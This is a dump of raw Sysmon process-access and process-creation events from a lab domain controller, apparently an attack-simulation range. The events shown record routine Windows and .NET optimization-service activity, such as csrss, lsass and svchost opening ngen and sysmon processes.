13:19:30.279{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-3201-000000009A01}2220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.279{08A6967A-44E2-6000-2E01-000000009A01}41805064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{08A6967A-44E2-6000-3201-000000009A01}2220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FFF9FEE5147) 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.248{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-44E2-6000-3101-000000009A01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.248{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-44E2-6000-3101-000000009A01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.232{08A6967A-44E2-6000-2F01-000000009A01}41924056C:\Windows\system32\conhost.exe{08A6967A-44E2-6000-3101-000000009A01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.232{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-3101-000000009A01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.232{08A6967A-44E2-6000-2E01-000000009A01}41805064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{08A6967A-44E2-6000-3101-000000009A01}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FFF9FEE5147) 10341000x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.138{08A6967A-44E2-6000-3001-000000009A01}5044740C:\Windows\system32\conhost.exe{08A6967A-44E2-6000-2D01-000000009A01}5084C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.123{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-3001-000000009A01}5044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.060{08A6967A-44E2-6000-2F01-000000009A01}41924056C:\Windows\system32\conhost.exe{08A6967A-44E2-6000-2E01-000000009A01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-2F01-000000009A01}4192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44E2-6000-2E01-000000009A01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.045{08A6967A-44E1-6000-2701-000000009A01}8804604C:\Windows\system32\taskhostw.exe{08A6967A-44E2-6000-2E01-000000009A01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b56bc|UNKNOWN(00007FFF9FEA11E2) 154100x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.050{08A6967A-44E2-6000-2E01-000000009A01}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe4.7.2053.0 built by: NET47REL1Microsoft .NET Framework optimization serviceMicrosoft® .NET FrameworkMicrosoft CorporationNGenTask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /StopEvent:364C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000{08A6967A-44E1-6000-2701-000000009A01}880C:\Windows\System32\taskhostw.exetaskhostw.exe /RuntimeWide 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.013{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 